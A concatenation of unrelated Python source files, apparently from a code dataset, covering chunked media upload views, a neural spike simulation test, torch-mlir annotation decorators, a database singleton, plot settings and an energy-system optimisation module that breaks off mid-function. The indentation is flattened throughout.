# Ensure the uploaded_file is closed because calling save() will open the file and read its content.
uploaded_file.close()
uploaded_file.delete()
# Reindex the media entry to make sure all tags are indexed
for backend in get_search_backends():
backend.add(media)
messages.success(request, _(f"'{media.title.capitalize()}' successfully uploaded!."), buttons=[
messages.button(reverse('chunked_media:index'), _('Index'))
])
return redirect('chunked_media:index')
except Exception as e:
messages.error(request, _(f"{media.title} could not be saved due to: {e}."))
else:
messages.error(request, _("The media file could not be saved due to errors."))
else:
media = Media(uploaded_by_user=request.user, type=media_type)
form = MediaForm(user=request.user, instance=media)
return render(request, "chunked_media/media/add.html", {
'form': form,
'media_type': media_type,
})
@permission_checker.require('change')
def edit(request, media_id):
Media = get_media_model()
MediaForm = get_media_form(Media)
media = get_object_or_404(Media, id=media_id)
if not permission_policy.user_has_permission_for_instance(request.user, 'change', media):
return permission_denied(request)
if request.POST:
original_file = media.file
form = MediaForm(request.POST, request.FILES, instance=media, user=request.user)
if form.is_valid():
if 'file' in form.changed_data:
# if providing a new media file, delete the old one.
# NB Doing this via original_file.delete() clears the file field,
# which definitely isn't what we want...
original_file.storage.delete(original_file.name)
messages.info(request, _(f"'{media.title.capitalize()}' is being processed"))
chunk_upload_path = upload_path(media.title)
uploaded_file = chunk_uploaded_file(request.FILES['file'], media.filename, chunk_upload_path)
# May need to make the chunk uploaded file method save into an intermediary model for this to work
form.instance.file = File(uploaded_file, os.path.basename(uploaded_file.path))
form.save()
# Ensure the uploaded_file is closed because calling save() will open the file and read its content.
uploaded_file.close()
uploaded_file.delete()
# media = save_final_media_to_model(chunk_uploaded_file(request.FILES['file'],
# media.filename,
# chunk_upload_path))
# Reindex the media entry to make sure all tags are indexed
for backend in get_search_backends():
backend.add(media)
messages.success(request, _(f"{media.title.capitalize()} updated"), buttons=[
messages.button(reverse('chunked_media:edit', args=(media.id,)), _('Edit'))
])
return redirect('chunked_media:index')
else:
messages.error(request, _("The media could not be saved due to errors."))
else:
form = MediaForm(instance=media, user=request.user)
filesize = None
# Get file size when there is a file associated with the Media object
if media.file:
try:
filesize = media.file.size
except OSError:
# File doesn't exist
pass
if not filesize:
messages.error(
request,
_("The file could not be found. Please change the source or delete the media file"),
buttons=[messages.button(reverse('chunked_media:delete', args=(media.id,)), _('Delete'))]
)
return render(request, "chunked_media/media/edit.html", {
'media': media,
'filesize': filesize,
'form': form,
'user_can_delete': permission_policy.user_has_permission_for_instance(
request.user, 'delete', media
),
})
@permission_checker.require('delete')
def delete(request, media_id):
Media = get_media_model()
media = get_object_or_404(Media, id=media_id)
if not permission_policy.user_has_permission_for_instance(request.user, 'delete', media):
return permission_denied(request)
if request.POST:
media.delete()
messages.success(request, _(f"{media.title.capitalize()} deleted."))
return redirect('chunked_media:index')
return render(request, "chunked_media/media/confirm_delete.html", {
'media': media,
})
def usage(request, media_id):
Media = get_media_model()
media = get_object_or_404(Media, id=media_id)
paginator, used_by = paginate(request, media.get_usage())
return render(request, "chunked_media/media/usage.html", {
'media': media,
'used_by': used_by
})
| StarcoderdataPython |
3292500 | <reponame>DerekYJC/bmi_python<gh_stars>0
#!/usr/bin/python
'''
Test case for PPFDecoder
'''
import numpy as np
from scipy.io import loadmat, savemat
import utils
from riglib.bmi import sim_neurons
import imp
imp.reload(sim_neurons)
kin_data = loadmat('paco_hand_kin.mat')
hand_kin = kin_data['hand_kin']
hand_vel = hand_kin[2:4, :]
X = utils.mat.pad_ones(hand_vel, axis=0, pad_ind=0).T
X2 = utils.mat.pad_ones(hand_vel, axis=0, pad_ind=-1).T
C = 20
Delta = 0.005
baseline_hz = 10
baseline = np.log(baseline_hz)
max_speed = 0.3 # m/s
max_rate = 70 # hz
mod_depth = (np.log(max_rate)-np.log(baseline_hz))/max_speed
pref_angle_data = loadmat('preferred_angle_c50.mat')
pref_angles = pref_angle_data['preferred_angle'].ravel()
pref_angles = pref_angles[:C]
# Load MATLAB sim results for comparison
N = 168510
N = 10000
data = loadmat('sample_spikes_and_kinematics_%d.mat' % N)
spike_counts = data['spike_counts']
beta = data['beta']
X = utils.mat.pad_ones(data['hand_vel'], axis=0, pad_ind=0).T
dt = 0.005
N = data['hand_vel'].shape[1]
k = 0
spikes = np.zeros([N, C])
## for k in range(C):
## tau_samples = data['tau_samples'][0][k].ravel().tolist()
## point_proc = sim_neurons.PointProcess(beta[:,k], dt, tau_samples=tau_samples)
## spikes[:,k] = point_proc.sim_batch(X[0:N, :])
##
## matching = np.array_equal(spike_counts[:,k], spikes[:,k])
## print k, matching
init_state = X[0,:]
tau_samples = [data['tau_samples'][0][k].ravel().tolist() for k in range(C)]
ensemble = sim_neurons.PointProcessEnsemble(beta, init_state, dt, tau_samples=tau_samples)
spikes_ensemble = np.zeros([N, C])
for n in range(1, N):
spikes_ensemble[n-1, :] = ensemble(X[n,:])
print(np.array_equal(spikes_ensemble, spike_counts))
| StarcoderdataPython |
1694558 | # Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
# Also available under a BSD-style license. See LICENSE.
from typing import List, Optional, Tuple, NamedTuple
import torch
# Decorators
# Currently, these decorators are very low-level and map 1:1 with
# methods on `torch_mlir.ClassAnnotator`. Eventually, we expect there to
# be a more elaborate Python layer which allows all the different annotations
# to be expressed conveniently and gives clearer error reports when
# the annotations aren't acceptable.
# This module is kept separate from torch_mlir.torchscript_annotations so that
# we can use this from code without C++ dependencies, which prevent us from
# interfacing the test framework across environments.
# Attribute names used for annotations.
# These should be kept in sync with their use in
# `torch_mlir/torchscript_annotations.py`.
TORCH_MLIR_EXPORT_ATTR_NAME = '_torch_mlir_export'
TORCH_MLIR_ARG_ANNOTATIONS_ATTR_NAME = '_torch_mlir_arg_annotations'
def export(fn):
"""Decorator that tells the torch-mlir compiler that a method is exported.
By default, no methods are exported, which is very important for
the compiler, because otherwise most Torch programs consist of a sea
of tiny exported functions with no rank or dtype information
(see `annotate_args`), which the compiler cannot do much with.
Note that this is different from `torch.jit.export`, which controls
which methods are scripted in the first place. For non-`forward` methods,
using this decorator usually means you also need `torch.jit.export`.
Conceptually, this decorator is annotating the scripted module, but is
applied to the original `torch.nn.Module` for convenience.
"""
setattr(fn, TORCH_MLIR_EXPORT_ATTR_NAME, True)
return fn
ArgAnnotation = Tuple[List[int], torch.dtype]
# TODO: Replace with py3 extended argument annotations when available.
# See https://www.python.org/dev/peps/pep-0593/
def annotate_args(annotations: List[Optional[ArgAnnotation]]):
"""Decorator that tells the torch-mlir compiler information about arguments.
The `annotations` should be a list of the same length as the number of
argument to the method (including `self`). Each list entry is either:
- None, corresponding to providing the compiler with no information.
- A 2-tuple consisting of a shape and a dtype, such as
`([2, 3, 4], torch.float32)`. A dimension with an unknown size can be
indicated by using `-1` as the size. This provides the compiler a
guarantee that the argument will always dynamically have the described
shape and dtype.
"""
# TODO: Check the number of arguments matches the number of arg annotations.
def decorator(fn):
setattr(fn, TORCH_MLIR_ARG_ANNOTATIONS_ATTR_NAME, annotations)
return fn
return decorator
| StarcoderdataPython |
3347496 | from python_library.src.custom_sqlalchemy.database import db
from python_library.src.custom_sqlalchemy.database import engine
from python_library.src.custom_sqlalchemy.database import session
class db_manager:
"""
DB管理クラス(シングルトンを想定)
"""
__instance = None
def __new__(cls, *args, **kwargs):
"""
クラスインスタンス生成前に、既にインスタンスが生成済みか確認してシングルトンを保証する
"""
if cls.__instance is None:
cls.__instance = super(db_manager, cls).__new__(cls)
cls.__instance.__db_instance = db
cls.__instance.__session = session
cls.__instance.__cursor = engine.raw_connection().cursor()
return cls.__instance
def get_db_instance(self):
return self.__db_instance
def get_session(self):
return self.__session
def get_cursor(self):
return self.__cursor
| StarcoderdataPython |
1798837 | <filename>Math_Apps/Leibnitz_sector_formula/leibnitz_settings.py
__author__ = 'benjamin'
# general settings
# visu
x_min_view = -1
x_max_view = 3
y_min_view = -2
y_max_view = 2
# control degree
t_value_min = 0
t_value_max = 1
t_value_step = .01
t_value_init = 0
resolution = 100
sample_curve_names = [
("circle", "circle"),
("shifted circle", "shift_circle"),
("cardioid", "cardioid"),
("cycloid", "cycloid")
]
sample_curves = {
"circle": ("sin(2*pi*t)", "cos(2*pi*t)"),
"shift_circle": ("1+sin(2*pi*t)", "1+cos(2*pi*t)"),
"cardioid": ("cos(2*pi*t)*(1+cos(2*pi*t))", "sin(2*pi*t)*(1+cos(2*pi*t))"),
"cycloid": ("1/5*(8*pi*t-sin(8*pi*t))", "1/5*(1-cos(8*pi*t))")
}
# function input
x_component_input_msg = sample_curves["cardioid"][0]
y_component_input_msg = sample_curves["cardioid"][1]
| StarcoderdataPython |
116237 | <reponame>fnbillimoria/OPEN
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
OPEN Energy System Module.
The EnergySystem Class has two types of methods
i) energy management system (EMS) methods which implement algorithms to
calculate Asset control references, and
ii) simulation methods which call an EMS method to obtain control
references for Asset objects, update the state of Asset objects by calling
their updatecontrol method and update the state of the Network by calling
its power flow method.
An EnergySystem has two separate time series, one for the EMS, and the
other for simulation.
OPEN includes two EMS methods for controllable Asset objects:
(i) one for multi-period optimisation
with a simple ‘copper plate’ network model, and
(ii) one for multi-period optimisation with a linear multi-phase
distribution network model which includes voltage and current flow
constraints.
Open has simulation methods for:
(i) open-loop optimisation, where the EMS method is run ahead of operation
to obtain controllable Asset references over the EMS time-series; and
(ii) for MPC, where the EMS method is implemented with a receding horizon
so that the flexible Asset references are updated at each step of the EMS
time series.
"""
#import modules
import copy
import pandas as pd
import pandapower as pp
import pandapower.networks as pn
import numpy as np
import picos as pic
import matplotlib.pyplot as plt
from System.Network_3ph_pf import Network_3ph
import cvxopt
__version__ = "1.0.2"
class EnergySystem:
"""
Base Energy Sysem Class
Parameters
----------
storage_assets : list of objects
Containing details of each storage asset
building_assets : list of objects
Containsing details of each building asset
nondispatch_assets : list of objects
Containsing details of each nondispatchable asset
network : object
Object containing information about the network
market : object
Object containing information about the market
dt_ems : float
EMS time interval duration (hours)
T_ems : int
Number of EMS time intervals
dt : float
time interval duration (hours)
T : int
number of time intervals
Returns
-------
EnergySystem
"""
def __init__(self, storage_assets, nondispatch_assets, network, market,
dt, T, dt_ems, T_ems, building_assets=[]):
self.storage_assets = storage_assets
self.building_assets = building_assets
self.nondispatch_assets = nondispatch_assets
self.network = network
self.market = market
self.dt_ems = dt_ems
self.T_ems = T_ems
self.dt = dt
self.T = T
#######################################
### Open Loop Control Methods
#######################################
def EMS_copper_plate(self):
"""
Energy management system optimization assuming all assets connected to
a single node.
Parameters
----------
self : EnergySystem object
Object containing information on assets, market, network and time
resolution.
Returns
-------
Output : dictionary
The following numpy.ndarrays are present depending upon asset mix:
P_ES_val : Charge/discharge power for storage assets (kW)
P_BLDG_val :Builfing power consumption (kW)
P_import_val :Power imported from central grid (kW)
P_export_val :Power exported to central grid (kW)
P_demand_val :System power demand at energy management time
resolution
"""
#setup and run a basic energy optimisation
#(single copper plate network model)
#######################################
### STEP 0: setup variables
#######################################
prob = pic.Problem()
N_ES = len(self.storage_assets)
N_BLDG = len(self.building_assets)
N_INDEPENDENT = N_ES + N_BLDG
N_nondispatch = len(self.nondispatch_assets)
P_demand_actual = np.zeros(self.T)
P_demand = np.zeros(self.T_ems)
for i in range(N_nondispatch):
P_demand_actual += self.nondispatch_assets[i].Pnet
#convert P_demand_actual to EMS time series scale
for t_ems in range(self.T_ems):
t_indexes = (t_ems*self.dt_ems/self.dt\
+ np.arange(0,self.dt_ems/self.dt)).astype(int)
P_demand[t_ems] = np.mean(P_demand_actual[t_indexes])
#######################################
### STEP 1: set up decision variables
#######################################
#controllable asset input powers
P_ctrl_asset = prob.add_variable('P_ctrl_asset',(self.T_ems,\
N_INDEPENDENT),\
vtype='continuous')
if N_BLDG > 0:
# cooling power
P_cooling = prob.add_variable('P_cooling',(self.T_ems,N_BLDG),\
vtype='continuous')
# heating power
P_heating = prob.add_variable('P_heating',(self.T_ems,N_BLDG),\
vtype='continuous')
# internal temperature
T_bldg = prob.add_variable('T_bldg',(self.T_ems,N_BLDG),\
vtype='continuous')
#(positive) net power imports
P_import = prob.add_variable('P_import',(self.T_ems,1),\
vtype='continuous')
#(positive) net power exports
P_export = prob.add_variable('P_export',(self.T_ems,1),\
vtype='continuous')
#(positive) maximum demand dummy variable
P_max_demand = prob.add_variable('P_max_demand',1,\
vtype='continuous')
#######################################
### STEP 2: set up constraints
#######################################
Asum_np = np.tril(np.ones([self.T_ems,self.T_ems])).astype('double')
#lower triangle matrix summing powers
Asum = pic.new_param('Asum',Asum_np)
#lbuilding thermal model constraints
for i in range(N_BLDG):
#maximum heating constraint
prob.add_constraint(P_heating[:,i] <= self.building_assets[i].Hmax)
#maximum cooling constraint
prob.add_constraint(P_cooling[:,i] <= self.building_assets[i].Cmax)
#minimum heating constraint
prob.add_constraint(P_heating[:,i] >= 0)
#minimum cooling constraint
prob.add_constraint(P_cooling[:,i] >= 0)
#maximum temperature constraint
prob.add_constraint(T_bldg[:,i] <= self.building_assets[i].Tmax)
#minimum temperature constraint
prob.add_constraint(T_bldg[:,i] >= self.building_assets[i].Tmin)
#power consumption is the sum of heating and cooling
prob.add_constraint(P_ctrl_asset[:,i] == P_cooling[:,i]\
+ P_heating[:,i])
for t in range(self.T_ems):
if t == 0:
# initial temperature constraint
prob.add_constraint(T_bldg[t,i] ==\
self.building_assets[i].T0)
else:
# Inside temperature is a function of heating/cooling and
# outside temperature. Alpha, beta and gamma are parameters
# derived from the R and C values of the building.
# Relation between alpha, beta, gamma, R and C can be found
# in the BuildingAsset class in the Assets.py file
prob.add_constraint(T_bldg[t,i] ==\
self.building_assets[i].\
alpha*T_bldg[t-1,i] \
- self.building_assets[i].\
beta*P_cooling[t-1,i] \
+ self.building_assets[i].\
beta*self.building_assets[i].\
CoP*P_heating[t-1,i] \
+ self.building_assets[i].\
gamma*self.building_assets[i].\
Ta[t-1])
#linear battery model constraints
for i in range(N_ES):
#maximum power constraint
prob.add_constraint(P_ctrl_asset[:,N_BLDG+i] <=\
self.storage_assets[i].Pmax)
#minimum power constraint
prob.add_constraint(P_ctrl_asset[:,N_BLDG+i] >=\
self.storage_assets[i].Pmin)
#maximum energy constraint
prob.add_constraint(self.dt_ems*Asum*P_ctrl_asset[:,N_BLDG+i] <=\
self.storage_assets[i].Emax\
-self.storage_assets[i].E0)
#minimum energy constraint
prob.add_constraint(self.dt_ems*Asum*P_ctrl_asset[:,N_BLDG+i] >=\
self.storage_assets[i].Emin\
-self.storage_assets[i].E0)
#final energy constraint
prob.add_constraint(self.dt_ems*Asum[self.T_ems-1,:]\
*P_ctrl_asset[:,N_BLDG+i] ==\
self.storage_assets[i].ET\
-self.storage_assets[i].E0)
#import/export constraints
for t in range(self.T_ems):
# power balance
prob.add_constraint(sum(P_ctrl_asset[t,:]) + P_demand[t] ==\
P_import[t]-P_export[t])
#maximum import constraint
prob.add_constraint(P_import[t] <= self.market.Pmax[t])
#maximum import constraint
prob.add_constraint(P_import[t] >= 0)
#maximum import constraint
prob.add_constraint(P_export[t] <= -self.market.Pmin[t])
#maximum import constraint
prob.add_constraint(P_export[t] >= 0)
#maximum demand dummy variable constraint
prob.add_constraint(P_max_demand >= P_import[t]-P_export[t])
if self.market.FR_window is not None:
FR_window = self.market.FR_window
FR_SoC_max = self.market.FR_SOC_max
FR_SoC_min = self.market.FR_SOC_min
for t in range(self.T_ems):
if FR_window[t] ==1:
for i in range(N_ES):
# final energy constraint
prob.add_constraint(self.dt_ems
* Asum[t,:]
* P_ctrl_asset[:,N_BLDG+i]
<= (FR_SoC_max
* self.storage_assets[i].Emax)
- self.storage_assets[i].E0)
# final energy constraint
prob.add_constraint(self.dt_ems
* Asum[t,:]
* P_ctrl_asset[:,N_BLDG+i]
>= (FR_SoC_min
* self.storage_assets[i].Emax)
- self.storage_assets[i].E0)
#######################################
### STEP 3: set up objective
#######################################
prob.set_objective('min',self.market.demand_charge*P_max_demand+\
sum(self.market.prices_import[t]*P_import[t]+\
-self.market.prices_export[t]*P_export[t]\
for t in range(self.T_ems)))
#######################################
### STEP 3: solve the optimisation
#######################################
print('*** SOLVING THE OPTIMISATION PROBLEM ***')
prob.solve(verbose = 0)
print('*** OPTIMISATION COMPLETE ***')
P_ctrl_asset_val = P_ctrl_asset.value
P_import_val = P_import.value
P_export_val = P_export.value
P_demand_val = P_demand
if N_BLDG > 0:
#Store internal temperature inside object
T_bldg_val = T_bldg.value
for b in range(N_BLDG):
self.building_assets[b].T_int = T_bldg_val[:,b]
if N_ES > 0 and N_BLDG > 0:
output = {'P_BLDG_val':P_ctrl_asset_val[:,:N_BLDG],\
'P_ES_val':P_ctrl_asset_val[:,N_BLDG:N_ES+N_BLDG],\
'P_import_val':P_import_val,\
'P_export_val':P_export_val,\
'P_demand_val':P_demand_val}
elif N_ES == 0 and N_BLDG > 0:
output = {'P_BLDG_val':P_ctrl_asset_val[:,:N_BLDG],\
'P_import_val':P_import_val,\
'P_export_val':P_export_val,\
'P_demand_val':P_demand_val}
elif N_ES > 0 and N_BLDG == 0:
output = {'P_ES_val':P_ctrl_asset_val[:,:N_ES],\
'P_import_val':P_import_val,\
'P_export_val':P_export_val,\
'P_demand_val':P_demand_val}
else:
raise ValueError('No dispatchable assets.')
return output
def simulate_network(self):
"""
Run the Energy Management System in open loop and simulate a pandapower
network.
Parameters
----------
self : EnergySystem object
Object containing information on assets, market, network and time
resolution.
Returns
-------
Output : dictionary
The following numpy.ndarrays are present depending upon asset mix:
buses_Vpu : Voltage magnitude at bus (V)
buses_Vang : Voltage angle at bus (rad)
buses_Pnet : Real power at bus (kW)
buses_Qnet : Reactive power at bus (kVAR)
Pnet_market : Real power seen by the market (kW)
Qnet_market : Reactive power seen by the market (kVAR)
P_ES_ems : Charge/discharge power for storage assets at energy
management time resolution (kW)
P_BLDG_ems :Builfing power consumption at energy management
time resolution (kW)
P_import_ems :Power imported from central grid at energy
management time resolution (kW)
P_export_ems :Power exported to central grid at energy
management time resolution(kW)
P_demand_ems :System power demand at energy management time
resolution (kW)
"""
#######################################
### STEP 1: solve the optimisation
#######################################
t0 = 0
output_ems = self.EMS_copper_plate()
N_ESs = len(self.storage_assets) #number of EVs
N_BLDGs = len(self.building_assets) #number of buildings
N_nondispatch = len(self.nondispatch_assets) #number of EVs
P_import_ems = output_ems['P_import_val']
P_export_ems = output_ems['P_export_val']
if N_ESs > 0:
P_ES_ems = output_ems['P_ES_val']
if N_BLDGs > 0:
P_BLDG_ems = output_ems['P_BLDG_val']
P_demand_ems = output_ems['P_demand_val']
#convert P_ES and P_BLDG signals to system time-series scale
if N_ESs > 0:
P_ESs = np.zeros([self.T,N_ESs])
for t in range(self.T):
t_ems = int(t/(self.dt_ems/self.dt))
P_ESs[t,:] = P_ES_ems[t_ems,:]
if N_BLDGs > 0:
P_BLDGs = np.zeros([self.T,N_BLDGs])
for t in range(self.T):
t_ems = int(t/(self.dt_ems/self.dt))
P_BLDGs[t,:] = P_BLDG_ems[t_ems,:]
#######################################
### STEP 2: update the controllable assets
#######################################
if N_ESs > 0:
for i in range(N_ESs):
self.storage_assets[i].update_control(P_ESs[:,i])
if N_BLDGs > 0:
for i in range(N_BLDGs):
self.building_assets[i].update_control(P_BLDGs[:,i])
#######################################
### STEP 3: simulate the network
#######################################
N_buses = self.network.bus['name'].size
P_demand_buses = np.zeros([self.T,N_buses])
Q_demand_buses = np.zeros([self.T,N_buses])
if N_ESs > 0:
#calculate the total real and reactive power demand at each bus
for i in range(N_ESs):
bus_id = self.storage_assets[i].bus_id
P_demand_buses[:,bus_id] += self.storage_assets[i].Pnet
Q_demand_buses[:,bus_id] += self.storage_assets[i].Qnet
if N_BLDGs > 0:
#calculate the total real and reactive power demand at each bus
for i in range(N_BLDGs):
bus_id = self.building_assets[i].bus_id
P_demand_buses[:,bus_id] += self.building_assets[i].Pnet
Q_demand_buses[:,bus_id] += self.building_assets[i].Qnet
for i in range(N_nondispatch):
bus_id = self.nondispatch_assets[i].bus_id
P_demand_buses[:,bus_id] += self.nondispatch_assets[i].Pnet
Q_demand_buses[:,bus_id] += self.nondispatch_assets[i].Qnet
buses_Vpu = np.zeros([self.T,N_buses])
buses_Vang = np.zeros([self.T,N_buses])
buses_Pnet = np.zeros([self.T,N_buses])
buses_Qnet = np.zeros([self.T,N_buses])
Pnet_market = np.zeros(self.T)
Qnet_market = np.zeros(self.T)
#print(P_demand_buses)
print('*** SIMULATING THE NETWORK ***')
for t in range(self.T):
#for each time interval:
#set up a copy of the network for simulation interval t
network_t = copy.deepcopy(self.network)
for bus_id in range(N_buses):
P_t = P_demand_buses[t,bus_id]
Q_t = Q_demand_buses[t,bus_id]
#add P,Q loads to the network copy
pp.create_load(network_t,bus_id,P_t/1e3,Q_t/1e3)
#run the power flow simulation
pp.runpp(network_t,max_iteration=100) # or “nr”
if t % 100 == 0:
print('network sim complete for t = '\
+ str(t) + ' of ' + str(self.T))
Pnet_market[t] = network_t.res_ext_grid['p_mw'][0]*1e3
Qnet_market[t] = network_t.res_ext_grid['q_mvar'][0]*1e3
for bus_i in range(N_buses):
buses_Vpu[t,bus_i] = network_t.res_bus['vm_pu'][bus_i]
buses_Vang[t,bus_i] = network_t.res_bus['va_degree'][bus_i]
buses_Pnet[t,bus_i] = network_t.res_bus['p_mw'][bus_i]*1e3
buses_Qnet[t,bus_i] = network_t.res_bus['q_mvar'][bus_i]*1e3
print('*** NETWORK SIMULATION COMPLETE ***')
if N_ESs > 0 and N_BLDGs > 0:
output = {'buses_Vpu':buses_Vpu,\
'buses_Vang':buses_Vang,\
'buses_Pnet':buses_Pnet,\
'buses_Qnet':buses_Qnet,\
'Pnet_market':Pnet_market,\
'Qnet_market':Qnet_market,\
'P_ES_ems':P_ES_ems,\
'P_BLDG_ems':P_BLDG_ems,\
'P_import_ems':P_import_ems,\
'P_export_ems':P_export_ems,\
'P_demand_ems':P_demand_ems}
elif N_ESs == 0 and N_BLDGs > 0:
output = {'buses_Vpu':buses_Vpu,\
'buses_Vang':buses_Vang,\
'buses_Pnet':buses_Pnet,\
'buses_Qnet':buses_Qnet,\
'Pnet_market':Pnet_market,\
'Qnet_market':Qnet_market,\
'P_BLDG_ems':P_BLDG_ems,\
'P_import_ems':P_import_ems,\
'P_export_ems':P_export_ems,\
'P_demand_ems':P_demand_ems}
elif N_ESs > 0 and N_BLDGs == 0:
output = {'buses_Vpu':buses_Vpu,\
'buses_Vang':buses_Vang,\
'buses_Pnet':buses_Pnet,\
'buses_Qnet':buses_Qnet,\
'Pnet_market':Pnet_market,\
'Qnet_market':Qnet_market,\
'P_ES_ems':P_ES_ems,\
'P_import_ems':P_import_ems,\
'P_export_ems':P_export_ems,\
'P_demand_ems':P_demand_ems}
else:
raise ValueError('No dispatchable assets.')
return output
# NEEDED FOR OXEMF EV CASE STUDY
def simulate_network_3phPF(self, ems_type = '3ph',
i_unconstrained_lines=[],
v_unconstrained_buses = []):
"""
Run the Energy Management System in open loop and simulate an IEEE 13
bus network either copper plate or 3ph
Parameters
----------
self : EnergySystem object
Object containing information on assets, market, network and time
resolution.
ems_type : string
Identifies whether the system is copper plate or 3ph. Default 3ph
i_unconstrained_lines : list
List of network lines which have unconstrained current
v_unconstrained_buses : list
List of buses at which the voltage is not constrained
Returns
-------
Output : dictionary
PF_network_res : Network power flow results stored as a list of
objects
P_ES_ems : Charge/discharge power for storage assets at energy
management time resolution (kW)
P_import_ems :Power imported from central grid at energy
management time resolution (kW)
P_export_ems :Power exported to central grid at energy
management time resolution(kW)
P_demand_ems :System power demand at energy management time
resolution (kW)
"""
#######################################
### STEP 1: solve the optimisation
#######################################
t0 = 0
if ems_type == 'copper_plate':
output_ems = self.EMS_copper_plate_t0(t0)
else:
output_ems = self.EMS_3ph_linear_t0(t0,
i_unconstrained_lines,
v_unconstrained_buses)
P_import_ems = output_ems['P_import_val']
P_export_ems = output_ems['P_export_val']
P_ES_ems = output_ems['P_ES_val']
P_demand_ems = output_ems['P_demand_val']
#convert P_EV signals to system time-series scale
N_ESs = len(self.storage_assets)
N_nondispatch = len(self.nondispatch_assets)
P_ESs = np.zeros([self.T,N_ESs])
for t in range(self.T):
t_ems = int(t/(self.dt_ems/self.dt))
P_ESs[t,:] = P_ES_ems[t_ems,:]
#######################################
### STEP 2: update the controllable assets
#######################################
for i in range(N_ESs):
self.storage_assets[i].update_control(P_ESs[:,i])
#######################################
### STEP 3: simulate the network
#######################################
N_buses = self.network.N_buses
N_phases = self.network.N_phases
P_demand_buses = np.zeros([self.T,N_buses,N_phases])
Q_demand_buses = np.zeros([self.T,N_buses,N_phases])
#calculate the total real and reactive power demand at each bus phase
for i in range(N_ESs):
bus_id = self.storage_assets[i].bus_id
phases_i = self.storage_assets[i].phases
N_phases_i = np.size(phases_i)
for ph_i in np.nditer(phases_i):
P_demand_buses[:,bus_id,ph_i] +=\
self.storage_assets[i].Pnet/N_phases_i
Q_demand_buses[:,bus_id,ph_i] +=\
self.storage_assets[i].Qnet/N_phases_i
for i in range(N_nondispatch):
bus_id = self.nondispatch_assets[i].bus_id
phases_i = self.nondispatch_assets[i].phases
N_phases_i = np.size(phases_i)
for ph_i in np.nditer(phases_i):
P_demand_buses[:,bus_id,ph_i] +=\
self.nondispatch_assets[i].Pnet/N_phases_i
Q_demand_buses[:,bus_id,ph_i] +=\
self.nondispatch_assets[i].Qnet/N_phases_i
#Store power flow results as a list of network objects
PF_network_res = []
print('*** SIMULATING THE NETWORK ***')
for t in range(self.T):
#for each time interval:
#set up a copy of the network for simulation interval t
network_t = copy.deepcopy(self.network)
network_t.clear_loads()
for bus_id in range(N_buses):
for ph_i in range(N_phases):
Pph_t = P_demand_buses[t,bus_id,ph_i]
Qph_t = Q_demand_buses[t,bus_id,ph_i]
#add P,Q loads to the network copy
network_t.set_load(bus_id,ph_i,Pph_t,Qph_t)
#run the power flow simulation
network_t.zbus_pf()
PF_network_res.append(network_t)
print('*** NETWORK SIMULATION COMPLETE ***')
return {'PF_network_res' :PF_network_res,\
'P_ES_ems':P_ES_ems,\
'P_import_ems':P_import_ems,\
'P_export_ems':P_export_ems,\
'P_demand_ems':P_demand_ems}
#######################################
### Model Predictive Control Methods
#######################################
def EMS_copper_plate_t0(self, t0):
"""
Setup and run a basic energy optimisation (single copper plate network
model) for MPC interval t0
"""
#######################################
### STEP 0: setup variables
#######################################
t0_dt = int(t0*self.dt_ems/self.dt)
T_mpc = self.T_ems-t0
T_range = np.arange(t0,self.T_ems)
prob = pic.Problem()
N_ES = len(self.storage_assets)
N_nondispatch = len(self.nondispatch_assets)
P_demand_actual = np.zeros(self.T)
P_demand_pred = np.zeros(self.T)
P_demand = np.zeros(T_mpc)
for i in range(N_nondispatch):
P_demand_actual += self.nondispatch_assets[i].Pnet
P_demand_pred += self.nondispatch_assets[i].Pnet_pred
# Assemble P_demand out of P actual and P predicted and convert to EMS
# time series scale
for t_ems in T_range:
t_indexes = ((t_ems * self.dt_ems / self.dt
+ np.arange(0, self.dt_ems / self.dt)).astype(int))
if t_ems == t0:
P_demand[t_ems-t0] = np.mean(P_demand_actual[t_indexes])
else:
P_demand[t_ems-t0] = np.mean(P_demand_pred[t_indexes])
# get total ES system demand (before optimisation)
Pnet_ES_sum = np.zeros(self.T)
for i in range(N_ES):
Pnet_ES_sum += self.storage_assets[i].Pnet
#get the maximum (historical) demand before t0
if t0 > 0:
P_max_demand_pre_t0 = np.max(P_demand_actual[0:t0_dt]\
+ Pnet_ES_sum[0:t0_dt])
else:
P_max_demand_pre_t0 = 0
#######################################
### STEP 1: set up decision variables
#######################################
# energy storage system input powers
P_ES = prob.add_variable('P_ES', (T_mpc,N_ES), vtype='continuous')
# energy storage system input powers
P_ES_ch = prob.add_variable('P_ES_ch', (T_mpc,N_ES),
vtype='continuous')
# energy storage system output powers
P_ES_dis = prob.add_variable('P_ES_dis', (T_mpc,N_ES),
vtype='continuous')
# (positive) net power imports
P_import = prob.add_variable('P_import', (T_mpc,1), vtype='continuous')
# (positive) net power exports
P_export = prob.add_variable('P_export', (T_mpc,1), vtype='continuous')
# (positive) maximum demand dummy variable
P_max_demand = prob.add_variable('P_max_demand', 1, vtype='continuous')
# (positive) minimum terminal energy dummy variable
E_T_min = prob.add_variable('E_T_min', 1, vtype='continuous')
#######################################
### STEP 2: set up constraints
#######################################
#lower triangle matrix summing powers
Asum = pic.new_param('Asum',np.tril(np.ones([T_mpc,T_mpc])))
eff_opt = self.storage_assets[i].eff_opt
# linear battery model constraints
for i in range(N_ES):
# maximum power constraint
prob.add_constraint((P_ES_ch[:,i] - P_ES_dis[:,i])\
<= self.storage_assets[i].Pmax[T_range])
# minimum power constraint
prob.add_constraint((P_ES_ch[:,i] - P_ES_dis[:,i])\
>= self.storage_assets[i].Pmin[T_range])
# maximum energy constraint
prob.add_constraint((self.dt_ems
* Asum
* (P_ES_ch[:,i] - P_ES_dis[:,i]))\
<= (self.storage_assets[i].Emax[T_range]
- self.storage_assets[i].E[t0_dt]))
# minimum energy constraint
prob.add_constraint((self.dt_ems
* Asum
* (P_ES_ch[:,i] - P_ES_dis[:,i]))\
>= (self.storage_assets[i].Emin[T_range]
- self.storage_assets[i].E[t0_dt]))
# final energy constraint
prob.add_constraint((self.dt_ems
* Asum[T_mpc-1,:]
* (P_ES_ch[:,i] - P_ES_dis[:,i])
+ E_T_min)\
>= (self.storage_assets[i].ET
- self.storage_assets[i].E[t0_dt]))
eff_opt = self.storage_assets[i].eff_opt
# P_ES_ch & P_ES_dis dummy variables
for t in range(T_mpc):
prob.add_constraint(P_ES[t, i] == (P_ES_ch[t, i]
/ eff_opt
- P_ES_dis[t, i]
* eff_opt))
